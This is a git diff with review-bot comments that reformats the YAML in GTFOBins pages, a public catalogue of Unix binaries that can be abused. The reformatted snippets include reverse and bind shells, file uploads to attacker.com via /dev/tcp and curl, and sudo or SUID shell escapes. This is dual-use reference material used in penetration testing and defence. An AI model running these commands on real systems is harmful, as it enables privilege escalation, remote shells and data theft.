diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index eb597b6..0656272 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- - code: ash
- sudo-enabled:
- - code: sudo ash
- suid-enabled:
- - code: ./ash
+ - code: ash
file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./ash"
+ sudo-enabled:
+ - code: sudo ash
---
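Review bot: The `suid-enabled` value on the new side is now `"./ash"` where the plain scalar `./ash` was already valid YAML, and the same unnecessary double-quoting recurs for `./bash -p`, `./csh -b`, `./dash -p`, `./env /bin/sh -p`, `./ksh -p`, `/lib/ld.so /bin/sh` and, worst, `"./find . -exec /bin/sh -p \\; -quit"`, where the backslash now has to be escaped. Together with the function keys being moved into one fixed order in every file, this looks like the output of a YAML dumper round-trip rather than hand edits; if that order is meant to be canonical it would help to say so in the commit message or a contributor note so later edits keep it. Leaving short command snippets as plain scalars (or `|` blocks) keeps them readable without un-escaping. The leading indentation of the hunk lines is not visible in this view, so the nesting of the new mappings could not be checked here.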
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 6782a72..90da062 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -1,34 +1,34 @@
---
functions:
execute-interactive:
- - code: awk 'BEGIN {system("/bin/sh")}'
- sudo-enabled:
- - code: sudo awk 'BEGIN {system("/bin/sh")}'
- suid-limited:
- - code: ./awk 'BEGIN {system("/bin/sh")}'
+ - code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
- s = "/inet/tcp/0/" RHOST "/" RPORT;
- while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
- while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+ s = "/inet/tcp/0/" RHOST "/" RPORT;
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- awk -v LPORT=$LPORT 'BEGIN {
- s = "/inet/tcp/" LPORT "/0/0";
- while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
- while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
- file-read:
- - code: |
- LFILE=file_to_read
- awk '//' "$LFILE"
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ awk -v LPORT=$LPORT 'BEGIN {
+ s = "/inet/tcp/" LPORT "/0/0";
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
file-write:
- - code: |
- LFILE=file_to_write
- awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
+ - code: |
+ LFILE=file_to_write
+ awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ awk '//' "$LFILE"
+ sudo-enabled:
+ - code: sudo awk 'BEGIN {system("/bin/sh")}'
+ suid-limited:
+ - code: ./awk 'BEGIN {system("/bin/sh")}'
---
diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
index 2dd7844..76f8551 100644
--- a/_gtfobins/base64.md
+++ b/_gtfobins/base64.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo base64 "$LFILE" | base64 --decode
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./base64 "$LFILE" | base64 --decode
file-read:
- - code: |
- LFILE=file_to_read
- base64 "$LFILE" | base64 --decode
+ - code: |
+ LFILE=file_to_read
+ base64 "$LFILE" | base64 --decode
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./base64 "$LFILE" | base64 --decode
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo base64 "$LFILE" | base64 --decode
---
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 0b67c26..5665958 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -1,52 +1,55 @@
---
functions:
execute-interactive:
- - code: bash
- sudo-enabled:
- - code: sudo bash
- suid-enabled:
- - code: ./bash -p
- upload:
- - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
- - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
- 3<>/dev/tcp/$RHOST/$RPORT \
- | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
+ - code: bash
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
- file-read:
- - description: It trims trailing newlines and it's not binary-safe.
- code: |
- export LFILE=file_to_read
- bash -c 'echo "$(<$LFILE)"'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
+ upload:
+ - description: Send local file in the body of an HTTP POST request. Run an HTTP
+ service on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
+ - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
+ 3<>/dev/tcp/$RHOST/$RPORT \
+ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
+ - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
+ on the attacker box to send the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write:
- - code: |
- export LFILE=file_to_write
- bash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ bash -c 'echo data > $LFILE'
+ file-read:
+ - description: It trims trailing newlines and it's not binary-safe.
+ code: |
+ export LFILE=file_to_read
+ bash -c 'echo "$(<$LFILE)"'
+ suid-enabled:
+ - code: "./bash -p"
+ sudo-enabled:
+ - code: sudo bash
---
diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md
index c1eac8f..7e387bb 100644
--- a/_gtfobins/busybox.md
+++ b/_gtfobins/busybox.md
@@ -4,23 +4,24 @@ description: |
what GTFBins binaries are supported. Here some example.
functions:
execute-interactive:
- - code: busybox sh
- sudo-enabled:
- - code: sudo busybox sh
- suid-enabled:
- - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
- code: ./busybox sh
- file-read:
- - code: |
- LFILE=file_to_read
- ./busybox cat "$LFILE"
- file-write:
- - code: |
- LFILE=file_to_write
- busybox sh -c 'echo "data" > $LFILE'
+ - code: busybox sh
upload:
- - description: Serve files in the local folder running an HTTP server.
- code: |
- export LPORT=12345
- busybox httpd -f -p $LPORT -h .
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ export LPORT=12345
+ busybox httpd -f -p $LPORT -h .
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ busybox sh -c 'echo "data" > $LFILE'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ ./busybox cat "$LFILE"
+ suid-enabled:
+ - description: It may drop the SUID privileges depending on the compilation flags
+ and the runtime configuration.
+ code: "./busybox sh"
+ sudo-enabled:
+ - code: sudo busybox sh
---
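Review bot: The `file-read` entry moved in this hunk invokes `./busybox cat`, the relative-path form that the other pages in this commit reserve for `suid-enabled` entries, while the sibling `file-write` entry here uses plain `busybox`; the two should agree unless the `./` is intentional, in which case a one-line `description` would make that explicit. The context line `what GTFBins binaries are supported. Here some example.` also misspells the project name and would read better as `Here are some examples.`, though it is outside the changed lines. The `description` block scalar this hunk sits inside starts before the hunk.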
diff --git a/_gtfobins/cat.md b/_gtfobins/cat.md
index da1e242..0278a57 100644
--- a/_gtfobins/cat.md
+++ b/_gtfobins/cat.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo cat "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./cat "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- cat "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ cat "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./cat "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo cat "$LFILE"
---
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index aa5b1e3..e37cb53 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- - code: csh
- sudo-enabled:
- - code: sudo csh
- suid-enabled:
- - code: ./csh -b
+ - code: csh
file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./csh -b"
+ sudo-enabled:
+ - code: sudo csh
---
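Review bot: The `file-write` entry that the hunk re-emits still runs `ash -c ...` although this page documents `csh`, and dash.md in the same commit has the identical mismatch with its own `file-write` entry calling `ash`. The reorder carries the mistake over unchanged, so the binary in those two snippets should be the documented one, or the entries dropped if they were copied from ash.md by accident.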
diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md
index c14cc1b..3ad8be7 100644
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@@ -1,20 +1,21 @@
---
functions:
upload:
- - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- URL=http://attacker.com/
- LFILE=file_to_send
- curl -X POST -d @$file_to_send $URL
+ - description: Send local file with an HTTP POST request. Run an HTTP service on
+ the attacker box to collect the file.
+ code: |
+ URL=http://attacker.com/
+ LFILE=file_to_send
+ curl -X POST -d @$file_to_send $URL
download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- URL=http://attacker.com/file_to_get
- LFILE=file_to_save
- curl $URL -o $LFILE
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ URL=http://attacker.com/file_to_get
+ LFILE=file_to_save
+ curl $URL -o $LFILE
file-read:
- - description: The file path must be absolute.
- code: |
- LFILE=/tmp/file_to_read
- curl file://$LFILE
+ - description: The file path must be absolute.
+ code: |
+ LFILE=/tmp/file_to_read
+ curl file://$LFILE
---
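Review bot: In the re-emitted `upload` entry, `LFILE=file_to_send` is assigned but the next line expands `$file_to_send`, a variable the snippet never sets, so the two lines disagree on the variable name. The `download` and `file-read` entries in the same hunk do use `$LFILE`, which makes the upload entry the odd one out; the defect predates the commit but is carried over as-is.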
diff --git a/_gtfobins/cut.md b/_gtfobins/cut.md
index ec0bce8..8c255b9 100644
--- a/_gtfobins/cut.md
+++ b/_gtfobins/cut.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo cut -d "" -f1 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./cut -d "" -f1 "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- cut -d "" -f1 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ cut -d "" -f1 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./cut -d "" -f1 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo cut -d "" -f1 "$LFILE"
---
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index 0e61b02..724a3dc 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- - code: dash
- sudo-enabled:
- - code: sudo dash
- suid-enabled:
- - code: ./dash -p
+ - code: dash
file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./dash -p"
+ sudo-enabled:
+ - code: sudo dash
---
diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md
index a34f5b7..4c8eb8d 100644
--- a/_gtfobins/dd.md
+++ b/_gtfobins/dd.md
@@ -1,11 +1,11 @@
---
functions:
- file-read:
- - code: |
- LFILE=file_to_read
- dd if=LFILE
file-write:
- - code: |
- LFILE=file_to_write
- echo "data" | dd of=$LFILE
+ - code: |
+ LFILE=file_to_write
+ echo "data" | dd of=$LFILE
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ dd if=LFILE
---
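Review bot: `dd if=LFILE` in the re-emitted `file-read` entry names the literal string `LFILE` instead of expanding the variable assigned on the line above, unlike the `file-write` entry beside it, which uses `$LFILE`. The mistake predates this commit, but since the commit rewrites the line it is the natural moment to make the two entries consistent.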
diff --git a/_gtfobins/diff.md b/_gtfobins/diff.md
index 77ad8b6..0fc0308 100644
--- a/_gtfobins/diff.md
+++ b/_gtfobins/diff.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo diff --line-format=%L /dev/null $LFILE
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./diff --line-format=%L /dev/null $LFILE
file-read:
- - code: |
- LFILE=file_to_read
- diff --line-format=%L /dev/null $LFILE
+ - code: |
+ LFILE=file_to_read
+ diff --line-format=%L /dev/null $LFILE
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./diff --line-format=%L /dev/null $LFILE
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo diff --line-format=%L /dev/null $LFILE
---
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index 2d9dc16..9683b83 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -1,22 +1,23 @@
---
functions:
execute-interactive:
- - code: |
- ed
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo ed
- !/bin/sh
- suid-limited:
- - code: |
- ./ed
- !/bin/sh
- file-read:
- - code: |
- ed file_to_read
+ - code: |
+ ed
+ !/bin/sh
file-write:
- - code: |
- ed file_to_write
- w
+ - code: |
+ ed file_to_write
+ w
+ file-read:
+ - code: 'ed file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo ed
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./ed
+ !/bin/sh
---
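Review bot: The `file-read` value is now `'ed file_to_read` followed by a blank line and a lone closing quote — a single-quoted scalar whose folded blank line stands in for the trailing newline the old `|` block carried; the value is unchanged but the form is much harder to read, and the same artifact appears in emacs.md, less.md, man.md, more.md and nano.md and in the `description` fields of expand.md, fmt.md and nl.md. more.md even mixes styles, writing `"./more file_to_read\n"` for one entry and the quoted-blank-line form for the next. Keeping `code: |` (or `|-` where the trailing newline is not wanted) for every multi-line snippet and `description: |` for prose is the consistent choice; if the dumper stays in the workflow, configuring it to emit block scalars avoids this.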
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index 7750506..d758d40 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -1,16 +1,17 @@
---
functions:
execute-interactive:
- - code: emacs -Q -nw --eval '(term "/bin/sh")'
- sudo-enabled:
- - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
- suid-enabled:
- - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
- file-read:
- - code: |
- emacs file_to_read
+ - code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write:
- - code: |
- emacs file_to_write
- C-x C-s
+ - code: |
+ emacs file_to_write
+ C-x C-s
+ file-read:
+ - code: 'emacs file_to_read
+
+'
+ suid-enabled:
+ - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
---
diff --git a/_gtfobins/env.md b/_gtfobins/env.md
index e0b5368..71b1e78 100644
--- a/_gtfobins/env.md
+++ b/_gtfobins/env.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: env /bin/sh
- sudo-enabled:
- - code: sudo env /bin/sh
+ - code: env /bin/sh
suid-enabled:
- - code: ./env /bin/sh -p
+ - code: "./env /bin/sh -p"
+ sudo-enabled:
+ - code: sudo env /bin/sh
---
diff --git a/_gtfobins/expand.md b/_gtfobins/expand.md
index a13ca84..8ff7fbd 100644
--- a/_gtfobins/expand.md
+++ b/_gtfobins/expand.md
@@ -1,17 +1,18 @@
---
-description: |
- The read file content is corrupted by replacing tabs with spaces.
+description: 'The read file content is corrupted by replacing tabs with spaces.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo expand "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./expand "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- expand "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ expand "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./expand "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo expand "$LFILE"
---
diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md
index 421084a..3e9602b 100644
--- a/_gtfobins/expect.md
+++ b/_gtfobins/expect.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: expect -c 'spawn /bin/sh;interact'
- sudo-enabled:
- - code: sudo expect -c 'spawn /bin/sh;interact'
+ - code: expect -c 'spawn /bin/sh;interact'
suid-enabled:
- - code: ./expect -c 'spawn /bin/sh -p;interact'
+ - code: "./expect -c 'spawn /bin/sh -p;interact'"
+ sudo-enabled:
+ - code: sudo expect -c 'spawn /bin/sh;interact'
---
diff --git a/_gtfobins/find.md b/_gtfobins/find.md
index 2305f6b..fc1386a 100644
--- a/_gtfobins/find.md
+++ b/_gtfobins/find.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: find . -exec /bin/sh \; -quit
- sudo-enabled:
- - code: sudo find . -exec /bin/sh \; -quit
+ - code: find . -exec /bin/sh \; -quit
suid-enabled:
- - code: ./find . -exec /bin/sh -p \; -quit
+ - code: "./find . -exec /bin/sh -p \\; -quit"
+ sudo-enabled:
+ - code: sudo find . -exec /bin/sh \; -quit
---
diff --git a/_gtfobins/flock.md b/_gtfobins/flock.md
index da940ed..28a0ec3 100644
--- a/_gtfobins/flock.md
+++ b/_gtfobins/flock.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: flock -u / /bin/sh
- sudo-enabled:
- - code: sudo flock -u / /bin/sh
+ - code: flock -u / /bin/sh
suid-enabled:
- - code: ./flock -u / /bin/sh -p
+ - code: "./flock -u / /bin/sh -p"
+ sudo-enabled:
+ - code: sudo flock -u / /bin/sh
---
diff --git a/_gtfobins/fmt.md b/_gtfobins/fmt.md
index 028e561..79b69ac 100644
--- a/_gtfobins/fmt.md
+++ b/_gtfobins/fmt.md
@@ -1,17 +1,18 @@
---
-description: |
- The read file content is not binary-safe.
+description: 'The read file content is not binary-safe.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./fmt -pNON_EXISTING_PREFIX "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- fmt -pNON_EXISTING_PREFIX "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ fmt -pNON_EXISTING_PREFIX "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./fmt -pNON_EXISTING_PREFIX "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
---
diff --git a/_gtfobins/fold.md b/_gtfobins/fold.md
index 275b96c..cf98e21 100644
--- a/_gtfobins/fold.md
+++ b/_gtfobins/fold.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo fold -w99999999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./fold -w99999999 "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- fold -w99999999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ fold -w99999999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./fold -w99999999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo fold -w99999999 "$LFILE"
---
diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md
index c8647d6..c80f99a 100644
--- a/_gtfobins/ftp.md
+++ b/_gtfobins/ftp.md
@@ -1,23 +1,23 @@
---
functions:
execute-interactive:
- - code: |
- ftp
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo ftp
- !/bin/sh
+ - code: |
+ ftp
+ !/bin/sh
upload:
- - description: Send local file to a FTP server.
- code: |
- RHOST=attacker.com
- ftp $RHOST
- put file_to_send
+ - description: Send local file to a FTP server.
+ code: |
+ RHOST=attacker.com
+ ftp $RHOST
+ put file_to_send
download:
- - description: Fetch a remote file from a FTP server.
- code: |
- RHOST=attacker.com
- ftp $RHOST
- get file_to_get
+ - description: Fetch a remote file from a FTP server.
+ code: |
+ RHOST=attacker.com
+ ftp $RHOST
+ get file_to_get
+ sudo-enabled:
+ - code: |
+ sudo ftp
+ !/bin/sh
---
diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md
index d8f60b9..413739b 100644
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@@ -7,11 +7,11 @@ description: |
[version 3](/gtfobins/python3/).
functions:
execute-interactive:
- - code: gdb -nx -ex '!sh' -ex quit
- sudo-enabled:
- - code: sudo gdb -nx -ex '!sh' -ex quit
+ - code: gdb -nx -ex '!sh' -ex quit
file-write:
- - code: |
- LFILE=file_to_write
- gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
+ - code: |
+ LFILE=file_to_write
+ gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
+ sudo-enabled:
+ - code: sudo gdb -nx -ex '!sh' -ex quit
---
diff --git a/_gtfobins/head.md b/_gtfobins/head.md
index e124d68..00a98a5 100644
--- a/_gtfobins/head.md
+++ b/_gtfobins/head.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo head -c1G "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./head -c1G "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- head -c1G "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ head -c1G "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./head -c1G "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo head -c1G "$LFILE"
---
diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md
index 6866485..4582300 100644
--- a/_gtfobins/ionice.md
+++ b/_gtfobins/ionice.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: ionice /bin/sh
- sudo-enabled:
- - code: sudo ionice /bin/sh
+ - code: ionice /bin/sh
suid-enabled:
- - code: ./ionice /bin/sh -p
+ - code: "./ionice /bin/sh -p"
+ sudo-enabled:
+ - code: sudo ionice /bin/sh
---
diff --git a/_gtfobins/jq.md b/_gtfobins/jq.md
index cc22b9c..c894c84 100644
--- a/_gtfobins/jq.md
+++ b/_gtfobins/jq.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo jq -Rr . "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./jq -Rr . "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- jq -Rr . "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ jq -Rr . "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./jq -Rr . "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo jq -Rr . "$LFILE"
---
diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md
index 7386e3f..1ebc62f 100644
--- a/_gtfobins/ksh.md
+++ b/_gtfobins/ksh.md
@@ -1,56 +1,59 @@
---
functions:
execute-interactive:
- - code: ksh
- sudo-enabled:
- - code: sudo ksh
- suid-enabled:
- - code: ./ksh -p
- upload:
- - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
- 3<>/dev/tcp/$RHOST/$RPORT \
- | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
+ - code: ksh
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
- file-read:
- - description: It trims trailing newlines.
- code: |
- export LFILE=file_to_read
- ksh -c 'echo "$(<$LFILE)"'
- - description: It trims trailing newlines.
- code: |
- export LFILE=file_to_read
- ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
+ upload:
+ - description: Send local file in the body of an HTTP POST request. Run an HTTP
+ service on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
+ - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
+ 3<>/dev/tcp/$RHOST/$RPORT \
+ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
+ - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
+ on the attacker box to send the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write:
- - code: |
- export LFILE=file_to_write
